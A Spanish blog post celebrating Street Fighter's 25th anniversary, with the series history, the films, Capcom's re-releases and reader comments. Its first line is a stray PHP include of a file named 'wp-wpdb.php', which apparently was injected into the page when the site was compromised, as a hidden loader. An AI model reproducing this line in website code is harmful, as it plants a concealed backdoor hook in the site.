if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Street Fighter 25 Aniversario – La Fortaleza de LeChuck

Street Fighter 25 Aniversario

Este año Capcom está de celebración. Una de sus franquicias más importantes en todo el mundo va a cumplir 25 años. Será el aniversario de Street Fighter. Quizá el mejor juego de lucha del mundo. Todo comenzó en agosto de 1987, Capcom triunfaba en los salones recreativos con arcades como Ghost’n Goblins, pero con Street Fighter puso la primera piedra para un éxito rotundo, que llegaría unos años más tarde con su secuela.
Este primer Street Fighter era, sin duda, un juego que pasó algo desapercibido, tuvo cierto renombre, pero el juego, una vez pasado el tiempo, denota un control y un apartado técnico bastante mejorable.
Sin embargo, todo esto cambió en 1991, cuando Street Fighter II inundó los salones recreativos y produjo una autentica fiebre en ellos, con colas para jugar en cada mueble que montaba el juego. Los ha-do-ken de Ryu o Ken se oían nada más pisar la entrada de las recreativas que más se preciaban, en cada rincón de las ciudades.
Street Fighter II nos presentaba 12 luchadores (menos en The World Warrior que no podiamos seleccionar a los jefes finales y se quedaron en 8) que tenían que competir, cada uno por diferentes razones, por batir a M.Bison, jefe de la organización Shadaloo. Los personajes eran los míticos: Ryu, Ken, Chun Li, Guile, Honda, Dhalsim, Blanka y Zangief. Balrog (M.Bison en Japón), Vega (Balrog), Sagat y M.Bison (Vega) hacían las veces de jefes finales.

El arcade fue un autentico triunfo, pero si algo dio que hablar, y mucho, fueron sus conversiones al mercado doméstico. Nintendo se apuntó un tanto al cerrar un acuerdo con Capcom para una conversión a su recien estrenada Super Nintendo y produjo una autentica guerra entre los usuarios de aquellos tiempos, propiciando quizá, junto a Mario o Sonic, una de las primeras batallas entre fanboys. Más adelante no hay plataforma que se precie (incluidas las actuales) que no tenga su versión del juego.

Street Fighter II es un mito vivo, no solo se quedó en el mundo de videojuegos, si no que dio el salto a otras formas de ocio y tiene un merchandising muy importante en todo el mundo. Películas de anime, de acción real y mangas completan la oferta de esta franquicia. Todos recordamos, por lo mala que es, la película de Van Damme (Street Fighter, la Última Batalla; 1994), que interpretaba a Guile (el soldado americano, claro está) y caricaturizaba a muchos de los personajes de la mitología de Capcom. Yo recordaré esta película por que fue la última de Raul Julia, en los créditos lleva la dedicatoria, genial actor recordado, entre otras, por La Familia Addams. En Street Fighter hacia el papel de M. Bison. En 2009, otro bodrio cinematográfico fue lanzado al mundo: Street Fighter, La Leyenda. Seguía la historia de Chun Li, interpretada por Kristin Kreuk (Lana Lang en Smallville) y bueno, digamos que no mejora mucho la perpetrada en los 90 por el soldado universal.
Street_Fighter_pelicula
Uno de los puntos negativos de esta saga, y de Capcom en general, es las múltiples versiones. Múltiples de ellas fueron saliendo a raíz de Street Fighter II. The World Warrior, Champion Edition, Turbo, The New Challengers,… Todas ofrecían el mismo juego con diferentes variantes, mayor jugabilidad, inclusión de nuevos movimientos o personajes, hacían que Capcom volviera a sacar el juego a la venta, teniendo que gastar las 12.000 pesetas, que más o menos era su precio por aquel entonces. Manía que en la actualidad, con los DLC, se ha acentuado, pagando por vestir a los personajes con un estúpido gorro vaquero, por ejemplo.
Después de Street Fighter II salieron varias subsagas, como Street Fighter Alpha (Zero en Japón) o los crossovers con otros personajes, como los superheroes de Marvel. En otra ocasión profundizaremos en estos títulos, también muy jugados.

Street Fighter III fue estrenado en 1997 y, aunque no logro el éxito, de la segunda parte, en cierta medida porque el mundo de la lucha estaba en pleno apogeo de las 3D, y un título en 2D clásico se veía como desfasado, fue un gran juego, quizá demasiado técnico. Fue, sin embargo, en 2008 cuando Capcom produjo otro terremoto jugable: Street Fighter IV. Una maravillosa mezcla de juego clásico en dos dimensiones, con personajes realizados en 3D con gráficos poligonales. El sistema de juego ha causado de nuevo revuelo, tanto en salones arcade (lamentablemente ya en España no abundan como antes) y el mercado doméstico y ha derrocado, en mi parecer, a los juegos de lucha basados en las tres dimensiones. Otros grandes títulos, como Mortal Kombat, ya han adoptado su estilo.

Capcom, para este 2012, está preparando grandes sorpresas para celebrar el 25º aniversario de la saga, aún no ha adelantado nada, no sabemos en que consistirán o que es lo que harán, pero todos esperamos que sea un gran año para la saga. Si anunciaran un Street Fighter V ya sería la bomba, aunque esto no es más un deseo personal. De momento ya tenemos abierto el blog de Capcom sobre el cumpleaños y con él vemos el logo que acompañará a los lanzamientos de este año, empezando por Street Fighter X Tekken.

Por LeChuck

Desde las profundidades del Caribe vigilo los mares.

4 comentarios

  1. juegazos ,el rey de los juegos de lucha sin lugar a duda , los juegos de lucha de namco y los kof son buenisimos pero no tienen lo que tiene SF, espero que los proximos street figther no sufran cambios tan bestias como los de sus hermanos de compañia xd

  2. Para mi si es la mejor de lucha, pero no la mejor saga de la historia eh "Anónimo", no nos pasemos xD

    La verdad es que ultimamente estoy en declive con juegos de lucha y plataformas. Está muy visto ya y no me enganchan.

  3. el problema es que en un juego de lucha no se pueden dar grandes cambios , no se puede hacer como en otros generos. El unico que puede ofrecer un margen mas alto para cambios son los super smash bros y aun asi los cambios q se dan en los juegos de lucha se limitan a mas personajes , solo hay que ver el marvel vs capcom ( el cual me gusta mucho y respeto) que ahora mismo tienen tantos personajes

Dejar un comentario